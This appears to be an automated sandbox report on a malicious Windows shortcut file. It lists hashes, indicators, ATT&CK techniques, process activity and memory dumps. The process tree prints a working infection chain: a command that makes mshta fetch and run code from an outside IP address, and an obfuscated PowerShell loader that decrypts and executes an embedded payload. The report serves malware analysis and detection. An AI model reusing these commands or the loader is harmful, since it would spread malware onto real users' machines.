f31c862a31ee968dafb32532059403438d2cfa5aaf8b5b1ad089b6ac027cec34

General

Target

a777dd29c0c24492eae7a4170d1599a5.lnk
Size

1KB
MD5

a777dd29c0c24492eae7a4170d1599a5
SHA1

a854b705c05dd4503d6de331cf1ad2716221c230
SHA256

f31c862a31ee968dafb32532059403438d2cfa5aaf8b5b1ad089b6ac027cec34
SHA512

5b0a100f1d0f61f3f87cc0f00e1be2096e009fe7b690dd37f32a4e3bb1d47495130e604f013ec1cf8f0616262b65d46090f5c3c81ee04172a9736a2b37994425

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://206.188.196.222/w1

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2668	mshta.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2520	powershell.exe
2468	powershell.exe
1676	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1688 wrote to memory of 2640	1688	cmd.exe	29
PID 1688 wrote to memory of 2640	1688	cmd.exe	29
PID 1688 wrote to memory of 2640	1688	cmd.exe	29
PID 2640 wrote to memory of 2520	2640	forfiles.exe	30
PID 2640 wrote to memory of 2520	2640	forfiles.exe	30
PID 2640 wrote to memory of 2520	2640	forfiles.exe	30
PID 2520 wrote to memory of 2668	2520	powershell.exe	31
PID 2520 wrote to memory of 2668	2520	powershell.exe	31
PID 2520 wrote to memory of 2668	2520	powershell.exe	31
PID 2668 wrote to memory of 2468	2668	mshta.exe	32
PID 2668 wrote to memory of 2468	2668	mshta.exe	32
PID 2668 wrote to memory of 2468	2668	mshta.exe	32
PID 2468 wrote to memory of 1676	2468	powershell.exe	35
PID 2468 wrote to memory of 1676	2468	powershell.exe	35
PID 2468 wrote to memory of 1676	2468	powershell.exe	35

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\a777dd29c0c24492eae7a4170d1599a5.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1688
- C:\Windows\System32\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://206.188.196.222/w1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    start mshta http://206.188.196.222/w1
    3⤵
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2520
  - - C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" http://206.188.196.222/w1
      4⤵
      Blocklisted process makes network request
      Modifies Internet Explorer settings
      Suspicious use of WriteProcessMemory
      PID:2668
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $KwYpv = 'AAAAAAAAAAAAAAAAAAAAAEzs+9D77CG0GJH50MpYmOojggymvqfNwT2BwwMZ6Zch1NPQ4AaEOsRMLSsp37BXwgQFAcJXARJMw4KNZ6Y7TW/7d/nu7pzfbiyFeMXeJ/G7I+yEjYPlZ8DUExyMMos/vJAnGl8usgEZloGvRz8TUIcrZNDIcfk/B3F5cgw/gplSXLesuAC5iZvkjvEu4ZkyJG2ruIZT4E9K3VGLm97lYCyJeriEvUpS7f4nPfXGqN0Xt2cKdd+1Fcuq+tewAqdoUhkrSJypQw+eY6VcnBnzimnZ2DrH3ZJEkVQQAu5pgY5U4T3OK+4nVOiMMxnzy62vZcQB2pW4nMuCptYW5UL69nNNXBr9RfmPdPNlb3K9FYgBb9yEWlkJ09LgDgXUzGxe/JMoRCvNyoodUu3jSjBg7lJdnmUsk3S7OfFGBemQdj2lRAvSvDRr6V7HuKyohVR78wXrOdmsRr41xwEfnfFidvxhlSge/UfvIw+U/62JVt/z7eRnSeDytb5JrmrzGaYy6mcKVD10Qg3+BJi2pkcks1mjOsSkB+Y1yt6ka4GJ/fTfAqtwINI7W4P3iDlVt5+MRQIgnvbCbz0acqjO1hhWVa9FgGwYxTGdaybvFxIKJbMPZSxBRqx8Yf6hNfxwTNyzXn8QKBcHUEQrli7eBTKdEckO2/tpJXihaZoJIiuuufnnAvMpPDCMF+L0JKJV5DX/VHTpGbLRLe9nWvLQWHXxaf3JMUsa2zVmve/N/MMvFNMMTlVj17Pcnj2QTLr5M8sf1c6hmobwegCyUFtdQMCsjw3e9wYHR0Loj7gQmQV9DTtSlM+oqgzWvePRoI2EqPvi5UUvVbKzHYdAmufFIhDGfWdM46b0C4upLOTyNCiyYUMtmdbExfrGWfpG4S0l354r3uuyK2ptWfcACANia4Hsl4EI3abMngZ/gLTJ1gDmhLSJr3W8hV9rnaXvugiJQO7R2VVqOIjc/cGxM6UAV4n3cqvjF7Qd8yvNHnQGdCNTqXQE9W4NWUHRoZfdojbqfzngNA==';$qUoZKXum = 'RU1nU1ptd1B5dEJPQkRUQ2l6WFZUYXBjWWxNblJEZG4=';$kbbrdQK = New-Object 'System.Security.Cryptography.AesManaged';$kbbrdQK.Mode = [System.Security.Cryptography.CipherMode]::ECB;$kbbrdQK.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$kbbrdQK.BlockSize = 128;$kbbrdQK.KeySize = 256;$kbbrdQK.Key = [System.Convert]::FromBase64String($qUoZKXum);$LGvCV = [System.Convert]::FromBase64String($KwYpv);$QwRLGiHB = $LGvCV[0..15];$kbbrdQK.IV = $QwRLGiHB;$hBUppQDnl = $kbbrdQK.CreateDecryptor();$MoYXNlkIj = $hBUppQDnl.TransformFinalBlock($LGvCV, 16, $LGvCV.Length - 16);$kbbrdQK.Dispose();$NeMj = New-Object System.IO.MemoryStream( , $MoYXNlkIj );$NjSGYp = New-Object System.IO.MemoryStream;$iiYETcerF = New-Object System.IO.Compression.GzipStream $NeMj, ([IO.Compression.CompressionMode]::Decompress);$iiYETcerF.CopyTo( $NjSGYp );$iiYETcerF.Close();$NeMj.Close();[byte[]] $iFVgn = $NjSGYp.ToArray();$peosnCLg = [System.Text.Encoding]::UTF8.GetString($iFVgn);$peosnCLg | powershell -
        5⤵
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2468
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
        6⤵
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1676

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7d3a618ebf3f7652180ca57c6d84985d

SHA1
46456502ba637f9e9a1914045527209bc7b0e49e

SHA256
142993679e54c90c2f588f65781651262f92c2ba3edf82a15e7b4d1f251010ec

SHA512
d818542725a9ff11754fd1a66d768fe4bf112aec76704557d96c23622a75754bb6e63d63fb758d4f9f2545203e141cd999848cacfeaa933ae20d8f6d2190e25d

Download Submit
memory/1676-72-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/1676-71-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/1676-68-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/1676-67-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/1676-66-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2468-57-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2468-60-0x0000000002B00000-0x0000000002B80000-memory.dmp

Filesize
512KB

Download
memory/2468-53-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download
memory/2468-56-0x0000000002B00000-0x0000000002B80000-memory.dmp

Filesize
512KB

Download
memory/2468-55-0x00000000025F0000-0x00000000025F8000-memory.dmp

Filesize
32KB

Download
memory/2468-54-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2468-73-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2468-58-0x0000000002B00000-0x0000000002B80000-memory.dmp

Filesize
512KB

Download
memory/2468-59-0x0000000002B00000-0x0000000002B80000-memory.dmp

Filesize
512KB

Download
memory/2468-70-0x000007FEF51C0000-0x000007FEF5B5D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-45-0x0000000002484000-0x0000000002487000-memory.dmp

Filesize
12KB

Download
memory/2520-44-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/2520-43-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp

Filesize
9.6MB

Download
memory/2520-69-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/2520-46-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/2520-42-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp

Filesize
9.6MB

Download
memory/2520-41-0x0000000002460000-0x0000000002468000-memory.dmp

Filesize
32KB

Download
memory/2520-40-0x000000001B350000-0x000000001B632000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing